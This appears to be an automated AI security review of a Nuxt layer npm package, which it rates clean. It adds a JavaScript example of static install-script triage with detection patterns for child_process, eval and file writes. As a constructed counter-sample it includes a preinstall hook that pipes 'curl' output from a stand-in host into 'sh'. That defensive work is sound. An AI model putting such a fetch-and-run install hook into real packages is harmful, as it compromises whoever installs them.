AI Security Review
scanned 7h ago · by lpm-firewall-ai
No confirmed malicious attack surface. The install-time hook runs Nuxt's standard prepare step for a Nuxt layer, and runtime network/credential handling is aligned with the app's documented backend workflows.
Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user running the SPA
Impact
No credential exfiltration, persistence, destructive behavior, or foreign AI-agent control-surface mutation identified
Mechanism
Nuxt layer configuration and browser API client
Rationale
Static inspection shows a large Nuxt SPA layer with a standard `nuxt prepare` postinstall and package-aligned client API/WebSocket code. Suspicious scanner labels are explained by normal frontend networking, auth/session handling, and user-invoked credential storage flows, with no concrete malicious chain.
Evidence
- package.json
- nuxt.config.ts
- app/composables/useApi.ts
- app/composables/api/client.ts
- app/composables/useWorkspaceStream.ts
- app/stores/auth.ts
- app/stores/personalSubscriptions.ts
Network endpoints (5)
- localhost:8787
- github.com/settings/tokens/new
- gitlab.com/-/user_settings/personal_access_tokens
- github.com
- openrouter.ai/keys
Decision evidence
public snapshot
AI called this Clean at 94.0% confidence as Benign with low false-positive risk.
Evidence for block
- package.json defines postinstall: nuxt prepare
Evidence against
- package.json has no bin and main is nuxt.config.ts for a Nuxt layer
- nuxt.config.ts only configures Nuxt modules, i18n, CSS paths, and local default apiBase
- No package files or binaries for preinstall/install payloads found
- No child_process, eval/vm/Function, native addon, or filesystem write/delete primitives found in package source
- Network code is ordinary SPA client traffic to the configured cat-factory backend and to user-facing OAuth/provider URLs
- Secrets/tokens are submitted to configured backend APIs or cached locally for app workflow; no exfiltration endpoint found
Behavioral surface
- Child Process
- Filesystem
- Network
- WebSocket
- Url Strings
- No License
Source & flagged code
2 flagged · package.json
• scripts.postinstall = nuxt prepare
High · Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
• scripts.postinstall = nuxt prepare
Medium · Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
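As an added example (not the scanner's code and not the reviewed package's), the checks listed under "Evidence against" and in the two flagged-code rules above, expressed as a small static triage in JavaScript: it enumerates install-time lifecycle hooks in package.json, treats a bare `nuxt prepare` as an allowlisted build step, sends anything chained or unknown to review, and scans source for the child_process/eval/filesystem-write/native-addon primitives the review says were absent. The allowlist, the severity mapping, the primitive regexes and the two sample packages are constructed assumptions for this example; it runs offline.

```javascript
// Added example, not the scanner's or the package's code: static triage of
// npm install-time lifecycle scripts mirroring the checks in this review.

// Hooks npm runs at install time. `prepare` also runs for git dependencies
// and local `npm install`, so it is included.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumption: commands considered benign build steps when they appear alone.
const ALLOWLISTED_COMMANDS = new Set(['nuxt prepare']);

// Assumption: source-level primitives a reviewer wants flagged (illustrative regexes).
const PRIMITIVES = [
  { name: 'child_process', re: /\b(child_process|execSync|spawnSync|execFileSync)\b/ },
  { name: 'dynamic_eval',  re: /\beval\s*\(|\bnew\s+Function\b|\bvm\.runIn(New|This)Context\b/ },
  { name: 'fs_write',      re: /\b(writeFileSync|writeFile|rmSync|unlinkSync|rmdirSync)\s*\(/ },
  { name: 'native_addon',  re: /\.node['"]\)|\bnode-gyp\b/ },
];

// Strip a leading `npx` and collapse whitespace so the allowlist matches the bare command.
function normalizeCommand(cmd) {
  return cmd.replace(/^npx\s+/, '').trim().replace(/\s+/g, ' ');
}

// One finding per install-time hook. A command is only 'low' if it is a single
// allowlisted command; shell chaining or substitution (&&, |, ;, $(), backticks,
// redirects) always forces human review, even if it starts with an allowlisted step.
function triageInstallScripts(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const raw = scripts[hook];
    const chained = /[;&|`$<>]/.test(raw);
    const allowlisted = !chained && ALLOWLISTED_COMMANDS.has(normalizeCommand(raw));
    findings.push({
      hook,
      command: raw,
      severity: allowlisted ? 'low' : 'medium',
      reason: allowlisted ? 'allowlisted build step' : 'not statically allowlisted; needs review',
    });
  }
  return findings;
}

// Scans a map of { path: sourceText } and reports which primitive each file contains.
function scanPrimitives(files) {
  const hits = [];
  for (const [path, text] of Object.entries(files)) {
    for (const p of PRIMITIVES) {
      if (p.re.test(text)) hits.push({ path, primitive: p.name });
    }
  }
  return hits;
}

// Combines both checks. An unreviewed install hook next to a dangerous primitive is
// the pattern worth blocking; an unreviewed hook alone is 'review'; otherwise 'clean'.
function reviewPackage(pkg, files) {
  const scripts = triageInstallScripts(pkg);
  const primitives = scanPrimitives(files);
  const unreviewed = scripts.filter((f) => f.severity !== 'low');
  let verdict = 'clean';
  if (unreviewed.length && primitives.length) verdict = 'block';
  else if (unreviewed.length) verdict = 'review';
  return { verdict, scripts, primitives, hasBin: Boolean(pkg.bin), main: pkg.main || null };
}

// Constructed sample shaped like the package in this review: a Nuxt layer with
// `nuxt prepare` as postinstall, no bin, and main pointing at nuxt.config.ts.
const LAYER_PKG = {
  name: 'example-nuxt-layer',
  main: 'nuxt.config.ts',
  scripts: { postinstall: 'nuxt prepare', dev: 'nuxi dev' },
};
const LAYER_SRC = {
  'app/composables/useApi.ts': 'export const useApi = () => $fetch(useRuntimeConfig().public.apiBase);',
};

// Constructed counter-example: a preinstall hook that shells out to download and run code.
const HOSTILE_PKG = { name: 'example-hostile', scripts: { preinstall: 'node setup.js' } };
const HOSTILE_SRC = {
  'setup.js': "require('child_process').execSync('curl -s https://example.invalid/x | sh');",
};

console.log(reviewPackage(LAYER_PKG, LAYER_SRC).verdict);     // clean
console.log(reviewPackage(HOSTILE_PKG, HOSTILE_SRC).verdict); // block
```

Run the triage against the published tarball's package.json and sources (what `npm install` actually executes), not the repository checkout, since the two can differ; and keep the allowlist to single bare commands, because `nuxt prepare && <anything>` is a different script from `nuxt prepare`.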
Findings
1 High · 2 Medium · 4 Low
High · Install Time Lifecycle Scripts · package.json
Medium · Ambiguous Install Lifecycle Script · package.json
Medium · Network
Low · Scripts Present
Low · Filesystem
Low · Url Strings
Low · No License